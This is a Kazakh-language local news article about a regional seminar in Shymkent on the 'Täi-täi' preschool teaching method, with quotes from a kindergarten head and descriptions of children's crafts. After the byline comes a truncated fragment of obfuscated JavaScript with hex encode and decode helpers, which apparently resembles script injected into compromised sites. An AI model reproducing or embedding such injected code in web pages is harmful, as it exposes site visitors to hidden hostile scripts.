08-09-2021
31.3 C
Шымкент

«Тәй-тәй» тиімді ме?

Бүлдіршіндердің бойына ұлттық салт-дәстүрді сіңіріп, танымдық жұмыстарды жүйелі түрде жүргізу бағытында «Халықаралық тәй-тәй» технологиясының маңызы зор. Бүгінде елімізде 77 балабақшада осы технология негізінде эксперименттік алаңға айналса, оның 5-і біздің қаламызда. 528

Жуырда №97 «Ақмарал» балабақшасында  «Мектепке дейінгі тәрбие мен оқытудың жаңа бағдарламасы іс-әжірибеде» атты облыстық семинарда облыстық, қалалық балабақша меңгерушілері мен тәрбиешілері бас қосып, «Тәй-тәй» технологиясының мән-маңызын талқылады.

Оған  республикалық «Балалық шақ» орталығының директоры Бижан Игенбаева келіп қатысты.

  • Бұл семинардың басты мақсаты — «Халықаралық тәй-тәй» технологиясын насихаттай отырып, мектеп жасына дейінгі балалармен жұмыс істеу саласына жаңаша педагогикалық және ақпараттық технологияларды енгізу арқылы, білім беру жүйесін жаңа түрін ұсыну. 2007 жылдан бастап осы технология негізінде балаларды тәрбиелеп келеміз. Байқағанымыз, эксперименттік топтағы балалар өз ойларын еркін жеткізеді. Өнерге деген қызығушылықтары оянды. Балабақшадағы топтық және жекелей жұмыстар нәтижесінде балалардың білім деңгейін көтеруге және қабілеттерін ұштай түсуге болатындығына көз жеткіздік, — дейді Шымкенттегі №97 «Ақмарал» бөбекжай-балабақшасының меңгерушісі Гүлмира Жаңабаева.

Семинарға жиналғандар топ-топқа бөлініп, әр топтың сабағына қатысты. Мәселен, «Қарлығаш» ІІ-ші кіші тобы «Алма бақтың кереметі» тақырыбында қағаздан қолөнер бұйымдарын жасап, жеміс-жидектен ас мәзірін ұсынды.  Ал, «Әсел» ортаңғы тобындағы балақайлар «Аққұмдағы өнер құпиясы» тақырыбында әңгіме өрбітіп, сусымалы заттармен жұмыс жасады. «Остров сохровищ» ересектер тобы моншақтардан әшекей заттарын жасаса, «Балауса» ересектер тобы оюлы текемет басты. Ал «Балдырған» мектепалды дайындық тобы қой жүнінен, «Ботақан» мектепалды дайындық тобы ши қамыстан түрлі заттар өрді.  «Тәй-тәй» технологиясы бойынша жұмыс істейтін тәрбиешілер балаларды көпшіл болуға, өз пікірін қалыптастыруға, жан-жантылыққа тәрбиелейтінін айтады. Сондай-ақ, ата-анамен тығыз байланыс орнатуға да септігі көп екенін жеткізді. Семинарға қатысқандар алдағы уақытта осы бағытта жұмыс жасап, бір-бірімен тәжірибе алмасатын болып тарқасты.

Ә.Бегімбет

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "oknews.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Соңғы жаңалықтар

ҰҚСАС ЖАЗБАЛАР